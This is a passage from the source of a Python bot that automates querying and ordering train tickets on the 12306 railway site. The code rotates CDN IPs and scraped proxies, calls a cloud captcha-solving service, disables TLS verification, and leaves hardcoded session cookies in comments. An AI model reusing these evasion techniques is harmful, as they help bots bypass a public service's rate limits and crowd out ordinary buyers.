"re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "queryOrderWaitTimeUrl": { # 订单等待页面 "req_url": "/otn/confirmPassenger/queryOrderWaitTime?random={0}&tourFlag=dc&_json_att=", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/confirmPassenger/initDc", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "queryMyOrderNoCompleteUrl": { # 订单查询页面 "req_url": "/otn/queryOrder/queryMyOrderNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "initNoCompleteUrl": { # 获取订单列表 "req_url": "/otn/queryOrder/initNoComplete", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_cdn": True, "is_json": False, }, "cancelNoCompleteMyOrder": { # 取消订单 "req_url": "/otn/queryOrder/cancelNoCompleteMyOrder", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/queryOrder/initNoComplete", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoSubmitOrderRequest": { # 快速自动提交订单 "req_url": "/otn/confirmPassenger/autoSubmitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "getQueueCountAsync": { # 快速获取订单数据 "req_url": "/otn/confirmPassenger/getQueueCountAsync", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "Content-Type": 1, "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "confirmSingleForQueueAsys": { # 快速订单排队 "req_url": "/otn/confirmPassenger/confirmSingleForQueueAsys", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Content-Type": 1, "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_cdn": True, "is_json": True, }, "Pushbear": { # push通知 "req_url": "/sub", "req_type": "post", "Referer": "", "Content-Type": 1, "Host": "pushbear.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": False, "is_json": True, }, "ServerChan": { # Server酱 push通知 "req_url": "/", "req_type": "get", "Referer": "", "Content-Type": 1, "Host": "sc.ftqq.com", "re_try": 10, "re_time": 0.01, "s_time": 0.1, "is_logger": True, "is_json": True, }, "loginHtml": { # 登录接口2 "req_url": "/otn/resources/login.html", "req_type": "get", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginConf": { # 登录接口2 "req_url": "/otn/login/conf", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "s_time": 0.1, "is_cdn": True, "is_logger": True, "is_json": True, }, "loginAysnSuggest": { # 登录接口2 "req_url": "/otn/login/loginAysnSuggest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.3, "is_cdn": True, "s_time": 0.1, "is_logger": True, "is_json": True, }, # 候补订单接口 "chechFace": { # 人脸识别 "req_url": "/otn/afterNate/chechFace", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "getSuccessRate": { # 成功信息 "req_url": "/otn/afterNate/getSuccessRate", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "SubmitOrderRequestRsp": { # 提交候补订单准备 "req_url": "/otn/afterNate/submitOrderRequest", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "confirmHB": { # 设置订单信息 "req_url": "/otn/afterNate/confirmHB", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "queryQueue": { # 排队 "req_url": "/otn/afterNate/queryQueue", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "passengerInitApi": { # 排队 "req_url": "/otn/afterNate/passengerInitApi", "req_type": "post", "Referer": "https://kyfw.12306.cn/otn/leftTicket/init", "Host": "kyfw.12306.cn", "re_try": 10, "re_time": 0.01, "s_time": 0.01, "is_cdn": True, "is_logger": True, "is_json": True, }, "autoVerifyImage": { # 云打码接口 "req_url": TickerConfig.REQ_URL, "req_type": "post", "Referer": "", "Host": TickerConfig.HOST, "re_try": 6, "re_time": 10, "s_time": 0.001, "is_logger": True, "is_json": True, "httpType": TickerConfig.HTTP_TYPE }, } File: agency/__init__.py File: agency/cdn_utils.py # encoding=utf8 import datetime import operator import os import requests from config import urlConf import threading from config.urlConf import urls from myUrllib.httpUtils import HTTPClient cdn_list = [] class CDNProxy(threading.Thread): def __init__(self, cdns): super().__init__() self.cdns = cdns self.urlConf = urlConf.urls self.httpClint = requests self.city_list = [] self.timeout = 5 def run(self): for cdn in self.cdns: http = HTTPClient(0) url = urls["loginInitCdn"] http._cdn = cdn.replace("\n", "") start_time = datetime.datetime.now() rep = http.send(url) retTime = (datetime.datetime.now() - start_time).microseconds / 1000 if rep and "message" not in rep and retTime < 3000: if cdn.replace("\n", "") not in cdn_list: # 如果有重复的cdn,则放弃加入 print(f"加入cdn: {cdn}") cdn_list.append({"ip": cdn.replace("\n", ""), "time": retTime}) def open_cdn_file(cdnFile): cdn = [] path = os.path.join(os.path.dirname(__file__), f'../{cdnFile}') try: with open(path, "r", encoding="utf-8") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn except Exception: with open(path, "r") as f: for i in f.readlines(): if i and "kyfw.12306.cn:443" not in i: cdn.append(i.replace("\n", "")) return cdn def sortCdn(): """ 对cdn进行排序 :return: """ ips = [] cs = sorted(cdn_list, key=operator.itemgetter('time')) for c in cs: print(f"当前ip: {c['ip']}, 延时: {c['time']}") ips.append(c["ip"]) return ips def filterCdn(): """ 过滤cdn, 过滤逻辑为当前cdn响应值小于1000毫秒 过滤日志: 加入cdn: 116.77.75.146 :return: """ cdns = open_cdn_file("cdn_list") cdnss = [cdns[i:i + 50] for i in range(0, len(cdns), 50)] cdnThread = [] for cdn in cdnss: t = CDNProxy(cdn) cdnThread.append(t) for cdn_t in cdnThread: cdn_t.start() for cdn_j in cdnThread: cdn_j.join() print(f"当前有效cdn个数为: {len(cdn_list)}") if cdn_list: ips = sortCdn() path = os.path.join(os.path.dirname(__file__), f'../filter_cdn_list') f = open(path, "a+") f.seek(0) f.truncate() f.writelines("") for ip in ips: f.writelines(f"{ip}\n") f.close() if __name__ == '__main__': filterCdn() File: agency/agency_tools.py # encoding=utf8 import os import random import socket import time import requests from bs4 import BeautifulSoup class proxy: def __init__(self): self.proxy_list = [] self.proxy_filter_list = [] def get_proxy(self): """ 获取未加工代理列表 :return: """ User_Agent = 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0' header = dict() header['User-Agent'] = User_Agent for i in range(1, 5): time.sleep(1) url = 'http://www.xicidaili.com/nn/' + str(i) res = requests.get(url=url, headers=header).content soup = BeautifulSoup(res, "html.parser") ips = soup.findAll('tr') for x in range(1, len(ips)): ip = ips[x] tds = ip.findAll("td") ip_temp = tds[1].contents[0] + ":" + tds[2].contents[0] print(ip_temp) self.proxy_list.append(ip_temp) def filter_proxy(self): """ 将不可用IP剔除 :return: """ socket.setdefaulttimeout(1) path = os.path.join(os.path.dirname(__file__), './proxy_list') f = open(path, "w") head = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'Connection': 'keep-alive'} url = "http://icanhazip.com" proxy_num = 0 for proxy in self.proxy_list: proxy_temp = {"https": "https://{}".format(proxy)} try: req = requests.get(url, proxies=proxy_temp, timeout=2, headers=head).content print(req) write_proxy = proxy + "\n" f.write(write_proxy) proxy_num += 1 except Exception: print ("代理链接超时,去除此IP:{0}".format(proxy)) continue print("总共可使用ip量为{}个".format(proxy_num)) def get_filter_proxy(self): """ 读取该可用ip文件 :return: 可用ip文件list """ path = os.path.join(os.path.dirname(__file__), './proxy_list') try: with open(path, "r", encoding="utf-8") as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) except Exception: with open(path, "r", ) as f: lins = f.readlines() for i in lins: p = i.strip("\n") self.proxy_filter_list.append(p) return self.proxy_filter_list def main(self): # self.get_proxy() self.filter_proxy() def setProxy(self): """ 开启此功能的时候请确保代理ip是否可用 查询的时候设置代理ip,ip设置格式是ip地址+端口,推荐可用的ip代理池:https://github.com/jhao104/proxy_pool :return: """ ip = self.get_filter_proxy() setIp = ip[random.randint(0, len(ip) - 1)] proxie = { 'http': 'http://{}'.format(setIp), 'https': 'http://{}'.format(setIp), } return proxie if __name__ == "__main__": a = proxy() print(a.get_filter_proxy()) File: myUrllib/httpUtils.py # -*- coding: utf8 -*- import json import random import socket from collections import OrderedDict from time import sleep import requests from fake_useragent import UserAgent import TickerConfig from agency.agency_tools import proxy from config import logger def _set_header_default(): header_dict = OrderedDict() # header_dict["Accept"] = "application/json, text/plain, */*" header_dict["Accept-Encoding"] = "gzip, deflate" header_dict[ "User-Agent"] = _set_user_agent() header_dict["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8" header_dict["Origin"] = "https://kyfw.12306.cn" header_dict["Connection"] = "keep-alive" return header_dict def _set_user_agent(): # try: # user_agent = UserAgent(verify_ssl=False).random # return user_agent # except: # print("请求头设置失败,使用默认请求头") # return 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.' + str( # random.randint(5000, 7000)) + '.0 Safari/537.36' return "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36" class HTTPClient(object): def __init__(self, is_proxy, cdnList=None): """ cdnList试试切换不包括查询的cdn,防止查询cdn污染登陆和下单cdn :param method: :param headers: Must be a dict. Such as headers={'Content_Type':'text/html'} """ self.initS() self._cdn = None self.cdnList = cdnList self._proxies = None if is_proxy is 1: self.proxy = proxy() self._proxies = self.proxy.setProxy() # print(u"设置当前代理ip为 {}, 请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!请注意代理ip是否可用!!!!!".format(self._proxies)) def initS(self): self._s = requests.Session() self._s.headers.update(_set_header_default()) return self def set_cookies(self, kwargs): """ 设置cookies :param kwargs: :return: """ for kwarg in kwargs: for k, v in kwarg.items(): self._s.cookies.set(k, v) def get_cookies(self): """ 获取cookies :return: """ return self._s.cookies.values() def del_cookies(self): """ 删除所有的key :return: """ self._s.cookies.clear() def del_cookies_by_key(self, key): """ 删除指定key的session :return: """ self._s.cookies.set(key, None) def setHeaders(self, headers): self._s.headers.update(headers) return self def resetHeaders(self): self._s.headers.clear() self._s.headers.update(_set_header_default()) def getHeadersHost(self): return self._s.headers["Host"] def setHeadersHost(self, host): self._s.headers.update({"Host": host}) return self def setHeadersUserAgent(self): self._s.headers.update({"User-Agent": _set_user_agent()}) def getHeadersUserAgent(self): return self._s.headers["User-Agent"] def getHeadersReferer(self): return self._s.headers["Referer"] def setHeadersReferer(self, referer): self._s.headers.update({"Referer": referer}) return self @property def cdn(self): return self._cdn @cdn.setter def cdn(self, cdn): self._cdn = cdn def send(self, urls, data=None, **kwargs): """send request to url.If response 200,return response, else return None.""" allow_redirects = False is_logger = urls.get("is_logger", False) req_url = urls.get("req_url", "") re_try = urls.get("re_try", 0) s_time = urls.get("s_time", 0) is_cdn = urls.get("is_cdn", False) is_test_cdn = urls.get("is_test_cdn", False) error_data = {"code": 99999, "message": u"重试次数达到上限"} if data: method = "post" self.setHeaders({"Content-Length": "{0}".format(len(data))}) else: method = "get" self.resetHeaders() if TickerConfig.RANDOM_AGENT is 1: self.setHeadersUserAgent() self.setHeadersReferer(urls["Referer"]) if is_logger: logger.log( u"url: {0}\n入参: {1}\n请求方式: {2}\n".format(req_url, data, method)) self.setHeadersHost(urls["Host"]) if is_test_cdn: url_host = self._cdn elif is_cdn: if self._cdn: # print(u"当前请求cdn为{}".format(self._cdn)) url_host = self._cdn else: url_host = urls["Host"] else: url_host = urls["Host"] http = urls.get("httpType") or "https" for i in range(re_try): try: # sleep(urls["s_time"]) if "s_time" in urls else sleep(0.001) sleep(s_time) try: requests.packages.urllib3.disable_warnings() except: pass response = self._s.request(method=method, timeout=5, proxies=self._proxies, url=http + "://" + url_host + req_url, data=data, allow_redirects=allow_redirects, verify=False, **kwargs) if response.status_code == 200 or response.status_code == 302: if urls.get("not_decode", False): return response.content if response.content: if is_logger: logger.log( u"出参:{0}".format(response.content.decode())) if urls["is_json"]: return json.loads( response.content.decode() if isinstance(response.content, bytes) else response.content) else: return response.content.decode("utf8", "ignore") if isinstance(response.content, bytes) else response.content else: print(f"url: {urls['req_url']}返回参数为空, 接口状态码: {response.status_code}") logger.log( u"url: {} 返回参数为空".format(urls["req_url"])) if self.cdnList: # 如果下单或者登陆出现cdn 302的情况,立马切换cdn url_host = self.cdnList.pop(random.randint(0, 4)) continue else: sleep(urls["re_time"]) except (requests.exceptions.Timeout, requests.exceptions.ReadTimeout, requests.exceptions.ConnectionError): pass except socket.error: pass return error_data File: myUrllib/__init__.py File: myUrllib/MySocketUtils.py # coding=utf-8 import json import socket import re # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect(('183.232.189.31', 80)) # get_str = 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: %s\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' # post_str = "POST {0} HTTP/1.1\r\n" \ # "Host: kyfw.12306.cn\r\n" \ # "Connection: close\r\n"\ # "Origin: https://kyfw.12306.cn\r\n" \ # "X-Requested-With: XMLHttpRequest\r\n" \ # "Referer: https://kyfw.12306.cn/otn/leftTicket/init\r\n" \ # "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ # "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ # "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ # "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ # "Content-Length: 9\r\n"\ # "Cookie: _passport_session=a459aba69761497eb31de76c27795e999613; _passport_ct=9116b2cb0bf443e1a01d22ac8c1ae449t5007; route=9036359bb8a8a461c164a04f8f50b252; BIGipServerpool_passport=200081930.50215.0000; BIGipServerotn=484704778.64545.0000\r\n\n"\ # "appid=otn\r\n" # # s.sendall(get_str.format("https://kyfw.12306.cn/otn/resources/login.html")) # s.sendall(post_str.format("https://kyfw.12306.cn/passport/web/auth/uamtk")) from config.urlConf import urls def default_get_data(): """ get请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 :return: """ return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ 'Host: kyfw.12306.cn\r\n' \ "Referer: {1}\r\n" \ 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ '\r\nAccept: */*\r\n' \ "Cookie: {2}\r\n\n"\ '\r\n' # return 'GET {0} HTTP/1.1\r\nConnection: close\r\n' \ # 'Host: kyfw.12306.cn\r\n' \ # 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36' \ # '\r\nAccept: */*\r\n' \ # '\r\n' def default_post_data(): """ post请求默认组装字符串 需要拼接的字符串 -- url 发送请求的全连接 -- Referer 请求页面来源 -- Content-Length: body 长度 -- Cookie 页面请求的身份认证 -- appid 接口请求报文 :return: """ return "POST https://kyfw.12306.cn{0} HTTP/1.1\r\n" \ "Host: kyfw.12306.cn\r\n" \ "Connection: close\r\n"\ "Origin: https://kyfw.12306.cn\r\n" \ "X-Requested-With: XMLHttpRequest\r\n" \ "Referer: {3}\r\n" \ "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n" \ "Content-Type: application/x-www-form-urlencoded; charset=UTF-8\r\n" \ "Accept: application/json, text/javascript, */*; q=0.01\r\n" \ "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0.1 Safari/604.3.5\r\n" \ "Content-Length: {2}\r\n"\ "Cookie: {4}\r\n\n"\ "{1}\r\n"\ # "\r\n" class socketUtils: def __init__(self, host, port=80): self.host = host self.port = port self.s = self.connect_socket(self.host, self.port) def connect_socket(self, host, port): """ 连接socket :param host: :param port: :return: """ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host if isinstance(host, str) else str(host), port if isinstance(port, int) else int(port))) return s def close_s(self): self.s.close() # def send(self, urls, Cookie=None, data=None): # """ # 发送请求 # :param urls: # :param data: # :param cookie: # :return: # """ # url = urls.get("req_url", "") # Referer = urls.get("Referer", "") # if urls.get("req_type", "get") == "post": # Content_Length = len(data) # Cookie = "tk=pnidlCoFy2B7wxO_X_pESbrkZFSq3OtVA_xzXwuba2a0; JSESSIONID=C6144324BFCE36AC5082E543E934E8B3; current_captcha_type=Z; _jc_save_fromDate=2018-08-03; _jc_save_fromStation=%u6DF1%u5733%2CSZQ; _jc_save_toDate=2018-08-03; _jc_save_toStation=%u957F%u6C99%2CCSQ; _jc_save_wfdc_flag=dc; ten_key=b5L6aMWfnzBm8CgQe8pcAKQsmVBS2PYH; BIGipServerpool_passport=166527498.50215.0000; BIGipServerotn=165937674.50210.0000; route=c5c62a339e7744272a54643b3be5bf64; RAIL_DEVICEID=fC-yepiUqNjsBiRvtLBXW4JqQmabCfB9QxI3FifJZK9YDRsImhJLSz4sAQ4HiGF7uQAFdFyISg6jA7KAhtpEldJV9ZMNsn6Dzm_psA5CBDwSNfiORf42w-LIRvkeGvdKFtegZwWGlkA2fVuEWKu-1xAYdCXRnsMD; RAIL_EXPIRATION=1533420302032; _jc_save_detail=true" # if data: # send_value = default_post_data().format(url, # data, # Content_Length, # Referer, # Cookie # ) # print("send_value: " + send_value) # self.s.sendall(send_value) # else: # self.s.sendall(default_get_data().format(url, # Referer, # Cookie)) # total_data = "" # while 1: # data = self.s.recv(1024) # total_data += data # if not data: # break # self.close_s() # print(total_data) # return self.recv_data(total_data) def recv_data(self, r_data): cookie = self.get_cookie(r_data) status_code = self.get_status_code(r_data) r_body = self.get_rep_body(r_data) return { "cookie": cookie, "status_code": status_code, "r_body": r_body } @staticmethod def get_cookie(recv_data): """ 提取cookie :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) cookies_re = re.compile(r"Set-Cookie: (\S+);") cookies = re.findall(cookies_re, recv_data) return "; ".join(cookies) @staticmethod def get_status_code(recv_data): """ 获取状态码 :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) http_code_re = re.compile(r"HTTP/1.1 (\S+) ") status_code = re.search(http_code_re, recv_data).group(1) return status_code @staticmethod def get_rep_body(recv_data): """ 获取返回值 :param recv_data: :return: """ if not isinstance(recv_data, str): recv_data = str(recv_data) if recv_data.find("{") != -1 and recv_data.find("}") != -1: data = json.loads(recv_data.split("\n")[-1]) return data else: print(recv_data) if __name__ == "__main__": so = socketUtils('183.232.189.31', 80) train_date = "2018-08-03" from_station = "SZQ" to_station = "CSQ" urls["select_url"]["req_url"] = "https://kyfw.12306.cn" + urls["select_url"]["req_url"].format(train_date, from_station, to_station) result = so.send(urls=urls["select_url"]) print(result) so = socketUtils('183.232.189.31', 80) data = "secretStr=Vgo534nDZiCH8NCvyEPcGepzJoRCjvYr34gKFv5CW1K1XtM6mtKHoiFPjUYvaVKoe06SMhUUpT%2FK%0AxIEIsBD4zHgJPpVyKiTPx80y6OCWhNgcKjib2LLMXMJfgTgh0RKPISjkDjVFmO9p905O%2FegDeKjp%0A1fhIeqCuYraHjNhI0PjQY39BAY4AHLzW0iGgDq8b%2FtpyOY8Td2XfIWNZJCWzgyPkNXOk0HUguB2G%0AKh2T8nlko6zb5ra%2B%2BA%3D%3D&train_date=2018-08-03&back_train_date=2018-08-03&tour_flag=dc&purpose_codes=ADULT&query_from_station_name=深圳&query_to_station_name=长沙&undefined" result1 = so.send(urls=urls["submit_station_url"], data=data) print(result1) # so = socketUtils('183.232.189.31', 80) # result = so.send(url="https://kyfw.12306.cn/passport/web/login", s_data="") # print(result) File: inter/CheckOrderInfo.py # coding=utf-8 from collections import OrderedDict from inter.GetQueueCount import getQueueCount from inter.GetRepeatSubmitToken import getRepeatSubmitToken class checkOrderInfo: def __init__(self, session, train_no, set_type, passengerTicketStrList, oldPassengerStr, station_dates, ticket_peoples): self.train_no = train_no self.set_type = set_type self.passengerTicketStrList = passengerTicketStrList self.oldPassengerStr = oldPassengerStr self.station_dates = station_dates self.ticket_peoples = ticket_peoples self.RepeatSubmitToken = getRepeatSubmitToken(session) self.getTicketInfoForPassengerForm = self.RepeatSubmitToken.sendGetRepeatSubmitToken() self.ticketInfoForPassengerForm = self.getTicketInfoForPassengerForm.get("ticketInfoForPassengerForm", "") self.token = self.getTicketInfoForPassengerForm.get("token", "") self.session = self.getTicketInfoForPassengerForm.get("session", "") def data_par(self): """ 参数结构 :return: """ data = OrderedDict() data['bed_level_order_num'] = "000000000000000000000000000000" data['passengerTicketStr'] = self.passengerTicketStrList.rstrip("_{0}".format(self.set_type)) data['oldPassengerStr'] = self.oldPassengerStr data['tour_flag'] = 'dc' data['randCode'] = "" data['cancel_flag'] = 2 data['_json_att'] = "" data['REPEAT_SUBMIT_TOKEN'] = self.token return data def sendCheckOrderInfo(self): """ 检查支付订单,需要提交REPEAT_SUBMIT_TOKEN passengerTicketStr : 座位编号,0,票类型,乘客名,证件类型,证件号,手机号码,保存常用联系人(Y或N) oldPassengersStr: 乘客名,证件类型,证件号,乘客类型 :return: """ CheckOrderInfoUrls = self.session.urls["checkOrderInfoUrl"] data = self.data_par() checkOrderInfoRep = self.session.httpClint.send(CheckOrderInfoUrls, data) data = checkOrderInfoRep.get("data", {}) if data and data.get("submitStatus", False): print (u'车票提交通过,正在尝试排队') ifShowPassCodeTime = int(checkOrderInfoRep["data"]["ifShowPassCodeTime"]) / float(1000) if "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep["data"]["ifShowPassCode"] == "Y": is_need_code = True elif "ifShowPassCode" in checkOrderInfoRep["data"] and checkOrderInfoRep['data']['submitStatus'] is True: is_need_code = False else: is_need_code = False QueueCount = getQueueCount(self.session, is_need_code, ifShowPassCodeTime, self.set_type, self.station_dates, self.train_no, self.ticket_peoples, self.ticketInfoForPassengerForm, self.token, self.oldPassengerStr, self.passengerTicketStrList, ) QueueCount.sendGetQueueCount() elif "errMsg" in data and data["errMsg"]: print(checkOrderInfoRep['data']["errMsg"]) elif 'messages' in checkOrderInfoRep and checkOrderInfoRep['messages']: print (checkOrderInfoRep['messages'][0]) File: inter/Query.py # coding=utf-8 import copy import random import wrapcache from config import urlConf from config.TicketEnmu import ticket from myUrllib.httpUtils import HTTPClient from config.configCommon import seat_conf_2 import TickerConfig class query: """ 查询接口 """ def __init__(self, selectObj, from_station, to_station, from_station_h, to_station_h, _station_seat, station_trains, ticke_peoples_num, station_dates=None, ): self.session = selectObj self.httpClint = HTTPClient(TickerConfig.IS_PROXY) self.httpClint.set_cookies(self.session.cookies) self.urls = urlConf.urls self.from_station = from_station self.to_station = to_station self.from_station_h = from_station_h self.to_station_h = to_station_h self.station_trains = station_trains self._station_seat = _station_seat if isinstance(_station_seat, list) else list(_station_seat) self.station_dates = station_dates if isinstance(station_dates, list) else list(station_dates) self.ticket_black_list = dict() self.ticke_peoples_num = ticke_peoples_num def station_seat(self, index): """ 获取车票对应坐席 :return: """ seat = {'商务座': 32, '一等座': 31, '二等座': 30, '特等座': 25, '软卧': 23, '硬卧': 28, '硬座': 29, '无座': 26, '动卧': 33, } return seat[index] def check_is_need_train(self, ticket_info): """ 判断车次是否为想要的车次,如果ticket_info为空,那么就不校验车次,直接返回True :param ticket_info: :return: """ if self.station_dates and self.station_trains: return ticket_info[3] in self.station_trains else: return True def sendQuery(self): """ 查询 :return: """ if TickerConfig.IS_CDN == 1 and self.session.cdn_list: self.httpClint.cdn = self.session.cdn_list[random.randint(4, len(self.session.cdn_list) - 1)] for station_date in self.station_dates: select_url = copy.copy(self.urls["select_url"]) select_url["req_url"] = select_url["req_url"].format(station_date, self.from_station, self.to_station, self.session.queryUrl) station_ticket = self.httpClint.send(select_url) value = station_ticket.get("data", "") if not value: print(u'{0}-{1} 车次坐席查询为空,查询url: https://kyfw.12306.cn{2}, 可以手动查询是否有票'.format( self.from_station_h, self.to_station_h, select_url["req_url"])) else: result = value.get('result', []) if result: for i in value['result']: ticket_info = i.split('|') if self.session.flag: print(f"车次:{ticket_info[3]} 出发站:{self.from_station_h} 到达站:{self.to_station_h} 历时:{ticket_info[10]}" f" 商务/特等座:{ticket_info[32] or '--'}" f" 一等座:{ticket_info[31] or '--'}" f" 二等座:{ticket_info[30] or '--'}" f" 动卧:{ticket_info[33] or '--'}" f" 硬卧:{ticket_info[28] or '--'}" f" 软座:{ticket_info[23] or '--'}" f" 硬座:{ticket_info[29] or '--'}" f" 无座:{ticket_info[26] or '--'}" f" {ticket_info[1] or '--'}") if ticket_info[1] == "预订" and self.check_is_need_train(ticket_info): # 筛选未在开始时间内的车次 for j in self._station_seat: is_ticket_pass = ticket_info[j] if ticket_info[11] == "Y": if is_ticket_pass != '' and is_ticket_pass != '无' and is_ticket_pass != '*': # 过滤有效目标车次 secretStr = ticket_info[0] train_no = ticket_info[2] query_from_station_name = ticket_info[6] query_to_station_name = ticket_info[7] train_location = ticket_info[15] stationTrainCode = ticket_info[3] leftTicket = ticket_info[12] start_time = ticket_info[8] arrival_time = ticket_info[9] distance_time = ticket_info[10] print(start_time, arrival_time, distance_time) seat = j try: ticket_num = int(ticket_info[j]) except ValueError: ticket_num = "有" print(u'车次: {0} 始发车站: {1} 终点站: {2} {3}: {4}'.format(ticket_info[3], self.from_station_h, self.to_station_h, seat_conf_2[j], ticket_num)) if seat_conf_2[j] == "无座" and ticket_info[3][0] in ["G", "D", "C"]: seat = 30 # GD开头的无座直接强制改为二等座车次 if wrapcache.get(train_no): print(ticket.QUERY_IN_BLACK_LIST.format(train_no)) continue else: if ticket_num != "有" and self.ticke_peoples_num > ticket_num: if TickerConfig.IS_MORE_TICKET: print( u"余票数小于乘车人数,当前余票数: {}, 删减人车人数到: {}".format(ticket_num, ticket_num)) is_more_ticket_num = ticket_num else: print(u"余票数小于乘车人数,当前设置不提交,放弃此次提交机会") continue else: print(u"设置乘车人数为: {}".format(self.ticke_peoples_num)) is_more_ticket_num = self.ticke_peoples_num print(ticket.QUERY_C) return { "secretStr": secretStr, "train_no": train_no, "stationTrainCode": stationTrainCode, "train_date": station_date, "query_from_station_name": query_from_station_name, "query_to_station_name": query_to_station_name, "seat": seat, "leftTicket": leftTicket, "train_location": train_location, "code": ticket.SUCCESS_CODE, "is_more_ticket_num": is_more_ticket_num, "cdn": self.httpClint.cdn, "status": True, } elif is_ticket_pass == '无' and ticket_info[37] == "1" and TickerConfig.TICKET_TYPE is 2: """ is_ticket_pass如果有别的显示,但是可以候补,可以提issues提出来,附上query log,我将添加上 判断车次是否可以候补 目前的候补机制是只要一有候补位置,立马提交候补 """ # 如果最后一位为1,则是可以候补的,不知道这些正确嘛? nate = list(ticket_info[38]) if wrapcache.get(f"hb{ticket_info[2]}"): continue for set_type in TickerConfig.SET_TYPE: if TickerConfig.PASSENGER_TICKER_STR[set_type] not in nate: if ticket_info[3][0] in ["G", "D", "C"] and set_type in ["一等座", "特等座", "二等座", "商务座", "无座"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } elif ticket_info[3][0] in ["T", "Z", "K"] and set_type in ["硬卧", "硬座", "无座", "软座", "软卧"]: return { "secretList": ticket_info[0], "seat": [set_type], "train_no": ticket_info[2], "status": True, "cdn": self.httpClint.cdn, } else: 